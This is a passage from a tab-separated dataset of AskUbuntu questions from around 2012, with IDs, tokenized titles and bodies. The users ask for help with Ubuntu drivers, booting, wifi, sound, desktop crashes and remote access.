type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sdb1 / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb5 during installation uuid=f45e78b8-f7f0-4e98-8e75-7454d7652f58 none swap sw 0 0 i also did the ntfsfix . the command was succesful here is the message . lung @ lung-kn226aar-aba-m8407c : ~ $ sudo ntfsfix /dev/sdb1 mounting volume ... ok processing of $ mft and $ mftmirr completed successfully . ntfs volume version is 3.1 . ntfs partition /dev/sdb1 was processed successfully .
236547	ubuntu 12.10 is compatible with an intel hd 4000 integrated video card ?	i want to know if ubuntu 12.10 is compatible with an intel hd 4000 integrated video card .
236549	how to work remotely on windows 8 from ubuntu 10.04	how can i work remotely on windows 8 machine from my ubuntu 10.04 pc ? is there any guide how to set up remote desktop and vnc this way ? ( i do n't want to use teamviewer ) .
236550	installed proprietary driver and i lost all sound	i previously only had right channel sound from my alc hd 883 realtek soundcard running 12.10 . i tried most everything from the troubleshooting guides and decided to try installing the proprietary realtek drivers . i installed them and now only have a dummy output , not actual hardware shows up in the pulse audio mixer . i also have lost alsamixer even though it is installed i get can not open mixer : no such file or directory . running aplay i get this : can not open mixer : no such file or directory can i undo what i did in terminal , or is there a way for me to reload the default 12.10 drivers and audio setup ? one channel is definitely better than no channels .
236552	do i need an internet connection to install ubuntu studio ?	i am intending to dual ubuntu studio with vista ( already on the computer ) . i am told by various online tutorials that i need an internet connection while installing ubuntu studio . i have installed the iso file and burned it to a dvd . does the installation process download more files for the os and if so , how much ?
236557	run a terminal command at startup	how can i run the terminal command sudo xinput set-button-map `` logitech unifying device . wireless pid:101b '' 1 10 3 4 5 6 7 8 9 2 at every startup ?
236565	do i need to format windows drive only or the whole hard disk ?	i want to install ubuntu on my dell notebook , currently it is running windows 7 . my question is : do i need to format windows partition ( i.e . c : / ) only or the whole hard disk to make an installation of ubuntu ? second question is : if i need to format windows partition only , would i be able to access data in my other partitions on the same hard disk having ntfs file system ?
236578	how do i reboot from the recovery console ?	i run ubuntu in a virtual machine and i 've managed to reset my password in recovery mode , by editing the parameters according to these instructions on superuser.com . summarizing my steps : i changed ro single at the end of the line beginning with linux to rw init=/bin/bash , while booting , then using the command passwd < username > , entered the new password twice . the password is reported to be updated successfully . however , when i try to reboot the system nothing happens . i tried the command reboot , but it does not work . if i type exit i get kernel panic . any tips on how to proceed ?
236579	brightness control with lag	i have a sony vaio s13 laptop with a nvidia 310m graphics card . ever since i installed ubuntu on it ( 11.10 , now running 12.04 ) i have been having a recurring problem with the brightness controls . besides the need to edit /etc/x11/xorg.conf and adding enablebrightnesscontrol=1 , some times brightness controls are very laggy and unresposive ( needs 2 or more key strokes to respond ) . i 've found a workaround that consists in generating a new xorg.conf file with nvidia-xconfig , re-adding the brightness line and rebooting , however a few sessions later the problem is back again . i still have not found when exactly does this happens and how to reproduce it , however it seems to have something to do with power management , as it often starts on the boot after changing from ac power to battery or vice-versa . on the other hand , it may be related to something that happens during boot or shutdown . does anyone has a similar problem and knows a fix ? edit : found a nice workaround with gnome 3 extension brightness control . unfortunately i ca n't set the fn keys to increase or decrease brightness , but setting a similar combination ( e.g . super+f2 ) , there is absolutely no lag .
236581	which command do you need to execute from the command line to call gnome disk utility ( disks ) ?	i have tried gnome-disk-utility and it has failed . yet again i have deleted the launcher for , 'disks ' which is gnome disk utility and now i ca n't see how i can open it . i am running 12.10 .
236583	installed mysql but can not login : access denied for user 'xxxxxx ' @ 'localhost ' ( using password : yes )	installed mysql - but not able to login with the user i created . it gives me the following error . access denied for user 'xxxxxx ' @ 'localhost ' ( using password : yes ) please help .
236584	ca n't boot ubuntu with uefi after upgrade to 12.10	i tried boot-repair with different options , and each time i get error : file not found . first time i selected sda3 as a separate efi partition ( which is correct ) here 's the configuration http : //paste.ubuntu.com/1493581/ second time selected sda1 ( backup efi partition ) , here 's the configuration http : //paste.ubuntu.com/1499490/
236585	asus zenbook ux32vd bootloader issues	seems to be a common problem and i thought i had fixed it except for one speedbump . also i ca n't boot into any os right now , the window 's bootloader is messed up now as well . so i 'm stuck in limbo and would like any help at all . i ran boot-repair and had a separate boot/efi at the beginning of my sda . i have two ssd 's , the internal ssd and an actual ssd . i 'm trying to install everything on the issd ( sdb ) and only put the bootloader/grub whatever needs to be on sda . i got this message : boot successfully repaired . you can now reboot your computer . please do not forget to make your bios boot on sda3/efi/ubuntu/grubx64.efi file ! but i do n't see an option in my bios to boot specifically to that . i think if i could , everything would be fine . here 's my boot-repair log as well - boot-repair log .
236588	strange behavior for hibernate on ubuntu 12.10	i 'm new to ubuntu , was previously using xp on a t60 laptop . under xp the hibernate ( sleep on disk ) and suspend ( sleep in ram ) functions were working great . when i switched to ubuntu i was informed that hibernate was n't activated by default due to motherboards not handling it properly . i believe i 'm not in this case since it works great with xp . i 've tried hibernate without modifying any configuration file , just using as suggested the cl command sudo pm-hibernate it works somehow : from time to time it works normally , but most of the time here is what happens : hibernates correctly after the cl command is issued starts resuming when powered on but stops with a black screen however i 've found a workaround to complete the resume : while the black screen is displayed , just use fn-f12 ( which by default is suspend ) resume from suspend by pressing fn again . the login screen appears . it worked anytime so far . to sum up , sometime hibernating from the cl does n't fully resume , but if we do a blind suspend and resume from suspend , then the computer is restored as it was before hibernating . i wonder how can suspend work with xp and not with ubuntu on the same computer . is this a bug ( i 'd be happy to file a bug if it helps ) ? can anybody points me to some related online documentation ? my computer : thinkpad t60 with dual core t2400 edit : as explained the comuter may get out of the black screen if a suspend-resume is done on the black screen . i tried to see if ubuntu was reading the keyboard during the black screen , before the suspend-resume ... it does ! but i 'm even more stunned ... if i type blindly `` dir '' at the black screen level , then when the resume is completed with the workaround mentioned above , and after i 've logged in , then i see the result of the dir command in the console i 've used to type the pm-hibernate command . what it seems to mean is that ubuntu is accepting commands before the login has occurred . seems to be a big security issue ...
236589	v12.10 on acer aspire boot problem	i have installed ubuntu 12.10 on my acer aspire d270 using a pendrive usb installer . it is installed alongside windows 7 . the installation completed and gave a `` successful '' message when it finished . however , when i attempt to boot to the ubuntu installation , the boot process hangs at `` stopped - saving kernal messages '' . the windows 7 installation works fine . any and all comments and suggestions will be appreciated .
236593	software-properties-gtk does not start	i 'm using ubuntu 12.10 . yesterday i noticed that software-properties-gtk does not work anymore . i have no idea why and what to do . when i start via terminal i get the following output : chocobai @ pfubuntu : ~ $ software-properties-gtk gpg : /tmp/tmpgkhlnl/trustdb.gpg : trust-db erzeugt traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/ubuntudrivers/detect.py '' , line 162 , in packages_for_modalias cache_map = packages_for_modalias.cache_maps [ apt_cache_hash ] keyerror : 4726621 during handling of the above exception , another exception occurred : traceback ( most recent call last ) : file `` /usr/bin/software-properties-gtk '' , line 103 , in < module > app = softwarepropertiesgtk ( datadir=options.data_dir , options=options , file=file ) file `` /usr/lib/python3/dist-packages/softwareproperties/gtk/softwarepropertiesgtk.py '' , line 178 , in __init__ self.init_drivers ( ) file `` /usr/lib/python3/dist-packages/softwareproperties/gtk/softwarepropertiesgtk.py '' , line 1097 , in init_drivers self.devices = detect.system_device_drivers ( ) file `` /usr/lib/python3/dist-packages/ubuntudrivers/detect.py '' , line 415 , in system_device_drivers for pkg , pkginfo in system_driver_packages ( apt_cache ) .items ( ) : file `` /usr/lib/python3/dist-packages/ubuntudrivers/detect.py '' , line 319 , in system_driver_packages for p in packages_for_modalias ( apt_cache , alias ) : file `` /usr/lib/python3/dist-packages/ubuntudrivers/detect.py '' , line 164 , in packages_for_modalias cache_map = _apt_cache_modalias_map ( apt_cache ) file `` /usr/lib/python3/dist-packages/ubuntudrivers/detect.py '' , line 129 , in _apt_cache_modalias_map m = package.candidate.record [ 'modaliases ' ] file `` /usr/lib/python3/dist-packages/apt/package.py '' , line 429 , in record return record ( self._records.record ) unicodedecodeerror : 'utf-8 ' codec ca n't decode byte 0xfc in position 777 : invalid start byte chocobai @ pfubuntu : ~ $ what i want to do is to completely reinstall the proprietary ati graphic drivers , because the game dungeondefenders does not start . also software-properties-gtk is useful to manage repositories . i thought about to apt-get purge software-properties-gtk but i 'm not sure whether this is safe or i 'd break something .
236598	best compression method ?	i want to compress a 16gb folder , but what 's the best method ? tar.gz ? tar.bz2 rar ? 7z ? would the archive be smaller if i first compressed in a method , then copy the compressed archive to a new folder , then re-compressed in some other method ? i need to make it fit on a dvd ( output maybe 8.5gb , do n't remember ) but putting `` 4370 mb '' makes the compressed file be 2.5gb part . btw , what 's the default compression method on ubuntu ? thanks in advance .
236599	how to create a bootable usb stick on windows but to install on linux	after a powr failure when upgrading to ubuntu 12.10 i have a completely deficient system . it is read only and despite many attempts i failed to remount it read write , fsck and mount -o rmount , rw do n't work , recovery mode does not work . i am not experienced with linux and under time pressure because have to write a paper until tomorrow and have only this computer . thus i thought it was best to reinstall . i have downloaded the iso on my usb stick on another computer . however , i ca n't us my startup disk creator as my usb stick is not being recognized as the filesystem is read only . i do n't have a bootable usb or disk around ( i know that 's stupid ) and i have no one using linux nearby who could help me create the stick . they all have windows . thus my question : can i create a bootable usb on a windows system but to install on a computer which has ubuntu on it ? the wuby client you can download for windows on the ubuntu site is .exe so it would be no use on a computer that has only linux on it ?
236600	how can i fix errors installing d-link dwa-121 wireless driver tarball ?	i tried the following instructions as given on d-link 's website to install the necessary drivers : supported os and kernel version : linux ( kernel 2.6.18 ~ 2.6.37 ) tar zxvf rtl8192cu_linux_v2.0.1406.20110309.tar.gz cd rtl8192cu_linux_v2.0.1406.20110309 make su make install reboot but i get errors when i run make . how to deal the error ?
236605	how can i cut the margin of a pdf or djvu file for optimal booklet printing ?	i have a file which has exaggerated margins . this forces me to print it as a booklet , otherwise i feel i 'm waisting paper ( a good size of the font allows me to do so ) . but if i print directly in booklet format i still get those large margins . how can i get rid of them ? can i create a new file in which those margins do not appear and print it optimally as a booklet ?
236616	brightness control keys on sony vaio not working on 12.10	hi everyone i 'm having a problem that for what i have seen its very common with the latest version of ubuntu . so i updated my graphics drivers on my laptop to the latest nvidia ones but now my brightness keys do not work anymore . i used fn + f5 to lower brightness and fn + f6 to increase it . i have a sony vaio laptop model vpccw25fl and my gpu is an nvidia gt330m . i have been trying some of the solutions answered here but none of them seem to work . i 'm really annoyed by this and it 's a chore that every so often i have to run a terminal command to lower the brightness but after a while it increases again !
236617	how to install driver for rtl8188cus wireless adaptor ?	i recently purchased an rtl8188cus wireless usb adaptor which does not seem to work out of the box . ubuntu 12.04 32bit network manager knows it 's there and can detect available networks however it is incapable of connecting . a driver download for this device is available from here unfortunately i have no idea how to install this driver . if someone could tell me the necessary commands i would be most grateful . lsusb bus 001 device 005 : id 0bda:8176 realtek semiconductor corp. rtl8188cus 802.11n wlan result of sudo lshw -c network *-network description : wireless interface physical id : 1 bus info : usb @ 1:7 logical name : wlan2 serial : 00:0f:12:82:0b:3a capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu driverversion=3.2.0-35-generic-pae firmware=n/a link=no multicast=yes wireless=ieee 802.11bgn
236619	playing sound with ubuntu qml toolkit preview	i 've installed the ubuntu qml toolkit preview as per the instructions on http : //developer.ubuntu.com/get-started/gomobile/ ( with a minor fiddle to get it working on 12.04 ) . i 'm trying to write an app that plays a sound file . aparrently you can do this using qtmultimediakit in qtquick 1 , but not in qtquick 2 as used by the toolkit . is it possible to write an app using the toolkit that plays sound ?
236620	ubuntu android shared folders	i have installed samba on ubuntu and shared a folder by right clicking on it and sharing it from it sharing option . i have an app on android that manages the files and it asks me for ip adress and the shared folder . however i can not find my ip address on ubuntu that can make connection to other devices i used to do this in windows cmd ipconfig and then every things showed up but i can not find it on ubuntu . i just need a way to make connection between them through nautilas .
236624	ubuntu remote control using android	ubuntu remote control is an android app . i want to use it to control my ubuntu desktop . it works on ssh . i 'm a newbie and do n't know how to setup . please help .
236627	driver for ati radeon x1350	i 've a laptop with ati radeon x1350 . i have problem with display in ubuntu 12.10 , the system is slow . i think that the problem is in the gpu . can i find an update to it ?
236631	how can i open a file when i do not know what command opens it ?	ubuntu noob here . how do i open a file in a working directory ? i have already tried ./myfile.jpg and it replies with bash : ./myfile.jpg : permission denied now , that got me thinking that i had to go and change the permissions . so i used chmod to make the file permission `` rwx '' ( i 'm not sure if making executable permissible is going to do what i want , it just seemed logical ) and tried ./myfile.jpg but this returned bash : ./myfile.jpg : can not execute binary file which makes me think the chmod was not the right way to go . so i changed the permission back so that it was not `` rwx '' , but just `` rw- '' . now i 'm stuck feeling pretty foolish because i ca n't open a simple file in terminal . i can open it by not using terminal and double clicking on the file while on the desktop , but i want to teach myself how to navigate using the terminal . i also tried sudo ./myfile.jpg but that did n't work either . any help ?
236632	how do i fix the `` no such partition '' error from grub ?	when i boot my computer i get the following error : welcome to grub ! error : no such partition . entering rescue mode ... grub rescue > my system has windows 7 and ubuntu in dual-boot ; ubuntu is installed with full-disk encryption . my computer does not have a cd drive .
236634	does the system suffer in performance because of full-disk encryption ?	i have a netbook that uses an ssd ( corsair force 3 ssd ( 5.02 ) ) . when installing ubuntu on it i chose an encrypted file system with ext4 . my question is : does the file system suffer any performance penalties by using encryption ? original russian translation i have a netbook that uses an ssd на нетбук вместо обычного механического диска поставил твёрдотельный ( corsair force 3 ssd ( 5.02 ) ) . when installing устанавливая новую систему ( ubuntu on it i chose an encrypted file system with ext412 . my question is:10 ) does the file system suffer any performance penalties by using encryption ? выбрал шифрованную файловую систем ext4 . вопрос : производительность файловой системы страдает от шифрования ? мои диски
236642	remove mail send client ssmtp and lsb-invalid-mta	i had ssmtp installed on my local desktop , due to some testing . now i uninstalled it with apt-get remove and in automatcally installed lsb-invalid-mta if i try to uninstall that too , it will install postfix . how do i remove all mail programs at all ? or are they removed now ? ( lsb-invalid-mta is a dummy )
236644	how do i install ubuntu 12.10 if gparted detects no drive , western digital sata hdd ?	i can not install ubuntu because it makes the claim that no drive space is available . in reality it is simply not detecting my hard drive , although it is physically hooked up . update : i am pretty sure it has nothing to do with jumpers , the hard drive has none so it is probably default/master , the dvd drive is slave . in any case , i arrived here because upon attempting to install ubuntu it sends me to that page with the check list after i choose the language , there is no window that appears between choosing the language and making sure i have drive space and internet connection . i have a western digital sata hdd ~500 gb and the bios is amibios 08.00.15 . how should i proceed with installing ubuntu 12.10 in this case ? bios drive information : vendor : wdc wd5000aacs-00g8b1 size :500.1gb lba mode : supported block mode :16sectors pio mode :4 async dma : mutiword dma-2 ultra dma : ultra dma-6 s.m.a.r.t . : supported s.m.a.r.t . is disabled
236650	how to connect internet using huawei ec1261 ( tata photon+ ) on ubuntu 12.10	i have installed ubuntu 12.10 ( 64 bit ) on dell inspiron 7520 laptop having intel i7 3rd generation processor . i am trying to connect mobile broadband device and am unable to establish a connection . 1 . when i try to add mobile broadband connection from 'network connections- > mobile broadband ' i can not see modem ( huawei ) in a drop-down in 'new connection ' window even if it is connected to laptop . 2 . when i ran command lsusb , output was : $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800/e173 ( hspa modem ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0bda:0129 realtek semiconductor corp . bus 001 device 004 : id 0c45:648d microdia bus 002 device 003 : id 8087:07da intel corp . here , we can see that 12d1:1446 huawei technologies co is identified . so i think that ubuntu is not able to recognize it as a modem . 3 . when i checked usb_moedswitch.rules file , i found entry for this device . i ran command $ cat /lib/udev/rules.d/40-usb_modeswitch.rules and in that file i found entry : # huawei , newer modems attrs { idvendor } == '' 12d1 '' , attrs { idproduct } == '' 1446 '' , run+= '' usb_modeswitch ' % b/ % k ' '' ubuntu is not able to recognize this device as a modem , even if this entry is present in this file . 4 . just for a trial , i ran command : $ usb_modeswitch -h -v 12d1 -p 1446 and got output as- : looking for default devices ... found matching product id adding device found device in default mode , class or configuration ( 1 ) accessing device 000 on bus 003 ... getting the current device configuration ... error getting the current configuration ( error -1 ) . assuming configuration 1 . using first interface : 0x00 using endpoints 0x08 ( out ) and 0x87 ( in ) inquiring device details ; driver will be detached ... looking for active driver ... no driver found . either detached before or never attached could not claim interface ( error -1 ) . skipping device inquiry error : could not get description string `` manufacturer '' error : could not get description string `` product '' error : could not get description string `` serial number '' usb description data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : product : serial no . : -- -- -- -- -- -- -- -- -- -- -- -- - sending huawei control message ... error : sending huawei control message failed ( error -1 ) . aborting . question i am not sure what is the exact problem and how to solve it . is it some kind of driver 's problem ? i am not expert in ubuntu . could anyone help me out ? thanks -- kanad
236651	how do i install additional drivers with both wired and wireless failing ?	i 've already put some effort in finding a solution to my wifi issue , yet all i 've found is about connecting to the internet in an alternative way first . however , i 'm unable to do so , as my wired network card does not work either . brief background previously , i owned a dell xps laptop on which i was running ubuntu 12.10 64-bit . now i got a new ( second hand ) machine , a dell vostro 1500 and decided to just take the hard drive from the xps and put it in the vostro , rather than having to reinstall ubuntu . all appears to be working , except for the wireless driver . the previous owner of the vostro went with the broadcom , unfortunately . worse yet , the wired ethernet adapter/port appears to be fried so i currently have no internet access at all . about my attempts if i launch `` software sources '' & `` additional drivers '' , it identifies an option for broadcom 802.11 linux sta wireless driver source for the bcm4311 . however , directly below the option it says `` this device is not working '' . i had assumed that was because i simply needed to install the proprietary drivers ( still mostly think that ) . however after i try to enable it , i get a progress bar for installing it that stops part way through and then the `` do not use the device '' option is reselected . i have the install media but have been unable to figure out how to get the system to extract the driver from it ( assuming internet only install ? ) . the only thing i have not yet tried was purchasing a usb style connecter & attempting hook into isp modem/router via usb based connection . i would rather not deal with it if there is an easier method using a few commands and/or file i can download form another machine . so , is there a way i can get this driver installed without having internet access ? i feel my technical knowledge/comprehension is above `` noob '' , but below proficient - so i like detailed steps when possible . i 'd really appreciate some help on this !
236658	new to unity . 3 quick questions:	new to unity . 3 quick questions : when working with the file manager , the icon view is the default . how do i make list view the default ? in the upper right corner of the screen , i see the time . i would like to see date and time . how do i do that ? what is the quickest way to minimize everything and see the desktop ?
236663	desktop cube not in compiz config settings	i downloaded compiz config settings , but a lot of things are missing , including desktop cube , cube rotate and a bunch more . how do i get all the settings and the desktop cube ?
236666	ubuntu 12.04 lts lan driver for atheros ar8132	is it possible to install a driver for lan atheros ar8132 network card on ubuntu 12.04 lts ? i have an error like peripheral not supported when i clic on the wifi icon . thanks for your help !
236668	any ubuntu/linux support for gigabyte-990fxa-ud3 ?	i recently got one gigabyte gaming pc . it has high end amd 8 core processor on gigabyte-990xa-ud3 ver 3.0 motherboard . unfortunately installation of linux failed to start the ethernet ( wired and wireless ) . i would like to know if someone has experienced anything similar ( may be on some other gigabyte amd board ) and can provide me directions on how to fix it ? currently board boots with ubuntu 12.04lts , but it does not have ethernet ( both wired , and add-on card for wifi do not gets enabled ) . ps : please redirect if this is not the correct forum for it ! thanks .
236669	how to automatically associate dropbox folder with the theme ?	in faenza & faience icon themes there is a dropbox icon for the folder of dropbox , but if i set my icons theme to one of theme nothing happens to the folder . so , i have to change the icon of the folder manually . how can i associate the dropbox folder to use the icon `` folder-dropbox.svg '' with any theme automatically ? also can i do the same thing for my created folders ? i want to create a folder called projects and associate it with the icon `` stock_bookmark.svg '' of any theme . note : i do not want the manual way of doing so ( using : folder 's properties- > basic- > custom icon )
236676	how do i publish a printer	i am trying to publish a printer in 12.10 so i can share via samba . in the printer properties , it shows `` not publishes , see server settings . i can not find the server settings .
236678	why does ubuntu 12.04 freeze ?	i dual booted ubuntu on windows 8 ( getting the dual boot right alone took 2 tries , thanks to uefi framework ) . after the dual boot , ubuntu started to freeze , mouse wo n't work , keypad wo n't work , i had no option but to power cycle it : ( ... it 's a new system , yet i had to power-cycle it twice before updating and switching to unity 2d mode . soon after something happened to grub and it failed to load , the system would boot straight into windows 8 . i had to delete the partition and re-install ubuntu , after re-installing i updated ubuntu and switched to unity 2d , but after 8 hours of use , it froze again . this is too much work , i just wan na install my linux based os and work with it , not spend every day re-installing it . i also tried searching about this bug on the internet . is there any way around this that is known of or maybe i could try getting 12.10 . does 12.10 freeze regularly as well ? i got my new system only a few weeks back , it has an intel core i5 processor and an intel hd 4000 integrated graphic , i do n't see how this could be hardware 's fault ? i know , my post has lot of useless information but it 's been so much work , just to get things work . i love coding on ubuntu , i like the nix-like environment but now , i think i might have to give it up if it 's gon na need me re-install it every other day .
236681	filesystem label rename	i 'm getting a strange error quark 11 on renaming my filesystems on ubuntu 12.10 64 . i 'm sure 100 % i 've already done it in the past without issues using the disk utility . maybe some recent upgrade or i do n't know what , but now i get an error ( do n't know how to change label on device of type filesystem : btrfs ( udisks-error-quark , 11 ) ) ... .. it 's not critical to me , but you may find it useful for the records ... i 've not been able to find anything around about this quark 11 error ... . thanks in advance
236684	ubuntu 12.10 64 bit repeatedly freezes	ubuntu 12.10 constantly freezes . this is not hardware issue in so much as navigating around in bios works fine for many hours/days without error . within a couple minutes of starting ubuntu , mouse/keepboard freeze , no way to talk to os . i have seen this reported in earlier versions of ubuntu and seen it happen in slackware 13 on a known good pc that runs winxp partition for many weeks with no errors . suspect a kernel problem that has lingered for a couple years now . this is happening on pretty diverse hardware that is known to work well . as people are seeing this with both 32 and 64 bit versions , not clear how switching , as some propose , should solve . anyone have any ideas on a clear fix ? dee
236685	not able to login using gnome classic or gnome although gnome with no effects and unity login works fine	well i was working on maya when suddenly my keyboard and mouse stopped responding so i had to press the system reset button . after that i recovered my system using fsck . i even tried rm -rf .gnome/.gconfd from my home directory in a virtual teminal ( by pressing ctrl + alt+f1 ) but i still was not able to login with gnome classic or just gnome selected , however if i change desktop environment to gnome with no effects or unity everything works fine ... what might be wrong , since i am new to ubuntu and still learning i need some help to get back to gnome classic . even gnome with no effects is fine but i do not like the close , minimize and restore button on the left ..
236687	gnome-shell does n't read the system-wide proxy configuration when installing extensions	i have two linux machines one at work and one at home they are identical hardware and the setup it pretty much the same . both run ubuntu 12.04 lts and gnome-shell 3.4.1 one difference is that to connect to internet at work i have to use the proxy server . eveything works well except for gnome extensions . for some reason i 'm unable to install extensions from http : //extensions.gnome.org at work . the switch on the page flicks and prompts about the installation but does n't do anything after that . nothing gets added to ~/.local/share/gnome-shell/extensions/ folder or the /usr/share/gnome-shell/extensions folder and also nothing shows up in the gnome-tweak-tool . also the flick switch returns to original position after the page is refreshed . i assume that something ( probably gnome-shell ) does n't read the $ http_proxy and $ https_proxy environment variables and tries to download the files directly , because at home where i do n't have proxy everything works fine . so the question is : does gnome-shell use the system-wide proxy settings when installing extensions . if not how can i force it to do so ( some nifty hack or smth ) ? hertz @ hertzbox : ~ $ uname -a linux hertzbox 3.2.0-35-generic # 55-ubuntu smp wed dec 5 17:42:16 utc 2012 x86_64 x86_64 x86_64 gnu/linux hertz @ hertzbox : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise hertz @ hertzbox : ~ $ gnome-shell -- version gnome shell 3.4.1 ~ george
236696	how to keep wifi on during `` suspend '' ?	when searching , i saw a load of questions about wifi not turning back on properly after coming out of suspend ; wifi is turned off when going into suspend . however , i have some background tasks i need running that need to connect to the internet , even in suspend mode . is there a way i can keep the wifi on when suspended ? ( i 'm plugged in to power 95 % of the time , so i 'm not bothered about it draining my battery . )
236704	autostart conky in xfce	i want to autostart conky in ubuntu 12.04 / xfce . i tryed to start this script with `` automatic starting applications '' in sessions options : sleep 6 conky but it does not work .
236706	where is the gnu pascal compiler ?	on ubuntu 10.04 i had installed the gnu pascal compiler ( package gpc ) . after moving to ubuntu 12.04 / 64 bit i can not find the package any more . google and the gnu pascal homepage did not help much . so i wanted to ask if the package has been discontinued , renamed , or moved to a different repository .
236707	security practice regarding users	please understand that i 've migrated to a ubuntu desktop from win7 some months ago and while i have been reading about sudoers and linux in general my understanding is still limited . this is how i have my users setup : a standard user ( not in the sudoers ) which i log into and use for all daily operations , running all my programs , browsing , designing , mailing , etc . an administrator user which i only switch into using the terminal by means of `` su [ user ] '' whenever i need to do something that requires privileges . ( just so i can `` sudo '' a command that requires it - basically doing what needs to be done and then switching back to the standard user ) my question is : is this a good security practice or does it make no sense at all to have it set up like this ? from what i can tell so far i do n't seem to need administrator privileges that often anyway . the reason i 'm asking is that i 've only recently learned that there is a difference between the root account and my administrator account : ) . i 'm still partially confused about it but from what i can gather you `` tap '' into the root account using something like `` sudo '' in the terminal while being logged in as a user that is in the sudoers ( an administrator ) . the strangeness of it is that in order to `` sudo '' something i basically enter the same password my administrator account has . does n't this mean that if my administrator account is compromised then so is the root account ? i 'm all too terribly confused by this : ( .
236708	12.04 does n't boot up after kernel update	i updated from 3.2.0-35 to 3.4 and now it just boots to a black screen after the bios . i have to press shift to bring up grub and go back to 3.2.0-35 . any idea how i can get 3.4 to work ? if not , how do i remove 3.4 ? also , did i download the right one ? the file name says it 's for amd64 , but synaptic is saying it 's for 32bit . what 's up with that ?
236716	how can i start x11vnc automatically on my pc ?	i have a spare computer that i want to remote desktop control from my windows 7 pc in my room . i got it to run and i used tightvnc to view and control it . my real issue is getting it to run automatically when i turn it on . any way to do that ?
236720	so how can i check if a progam is running ?	i have installed 64 bits bitdefender on ubuntu 12.04 lts 64 bit . after updating the virusdefinitions i clicked on the 'hide ' button . now i am wondering if bitdefender is still running . so how can i check if bitdefender is running ?
236721	error while upgrading to 12.04 -- trouble fetching files	while trying to upgrade , i got this error . has anyone seen it before ? please advise me on what to do ! thank you ! w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/source/sources.gz 404 not found w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/binary-i386/packages.gz 404 not found e : some index files failed to download , they have been ignored , or old ones used instead .
236726	how do i fix the `` duplicate sources.list entry '' warning ?	when i run sudo apt-get install -f i get this output : reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : libedbus1 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . w : duplicate sources.list entry http : //extras.ubuntu.com/ubuntu/ precise/main amd64 packages ( /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages ) w : duplicate sources.list entry http : //extras.ubuntu.com/ubuntu/ precise/main i386 packages ( /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages ) w : you may want to run apt-get update to correct these problems how do i fix these warnings ?
236730	how can i uninstall 64-bit ubuntu to install 32-bit ?	wubi has automatically installed 64-bit ubuntu on my 32-bit windows vista laptop . virtually every action in ubuntu is now met with an error message . can i cleanly remove this installation and re-install the appropriate 32-bit version ? as a slightly long in the the tooth 20-something year user of microsoft os i would be grateful of some not too techy advice . i 'm trying to improve my knowledge but it 's a slow process and i 'm hoping that this episode wo n't put me off . i see that there are similar issues previously addressed but nothing that appears quite the same as my problem .
236732	compiz crashed - i have a blank screen - how can i recover ?	i have ubuntu 12.10 64 bit . compiz crashed just after i changed a setting in touchpad section ( i didn‘t even have the ccsm installed ) . now i am getting a blank screen without title bar , etc - only mouse is working . alt-f2 also doesn‘t work . the same thing happens with guest account also . i‘ve also tried restarting multiple times . on tty1 ( ctrl-alt-f1 ) , i tried running display=:0 compiz -- replace display=:0 compiz -- reset display=:0 unity -- replace display=:0 unity -- reset none has worked so far . the first two commands give the error : invalid mit-magic-cookie-1 keycompiz ( core ) - fatal : couldn‘t open display :0 or sometime just hang . unity -- replace just hangs after giving a lot of plugin init failed errors alongwith error : plugin ‘opengl‘ not loaded and unity -- reset says reset is deprecated . i also don‘t see any ubuntu logo beside the username , so i am unable to login in unity 2d . i have amd hd 7730m and i was not able to install the proprietary driver before the crash .
236735	dual boot windows 7 and ubuntu 12.04 , facing partition issues	i have just bought a new pc having windows 7 installed , it has 500 gb disk space . attached is the screen shot of the disk management c : -installed windows 97.5 gb d : - kept required data 195.31 gb g : - isautomatically made and says system reserved 100 mb rest is unallocated 172.79 gb target : i want to have dual-boot system : windows 7 and ubuntu 12.04 on my machine . problem detail : trying to install ubuntu 12.04 desktop edition from usb , but facing issues while assigning the partition . i created the primary , ext4 , partition of of size = free space - 8 gb i wanted to utilize this 8 gb for swap size , but i can not see the space remaining anywhere i do not know how to provide space for swap at this point.. i am stuck at this point and not able to move forward . can someone guide how to proceed and create paritition successfully fyi : i donot want to go with wubi as it just creates 32 gb . and i might face issues later for expanding the disk . please advice .
236739	no audio input device will work	i am a very new user of ubuntu and am not very tech savy at all ! i have just installed ubuntu 12.10 and am trying to set up skype on my dell inspiron 6400 . my mikomi dc-7120 webcam works but audio input does not . when i go to the sound manager on the system setting tool it shows the audio input device is present but if i make a noise it does not register this at all . i thought perhaps the microphone on the webcam was not recognized so i tried plugging a set of headphones into the audio input jack : the system recognizes that another input device is present but will not register any sound being `` heard '' no matter how loud i am .
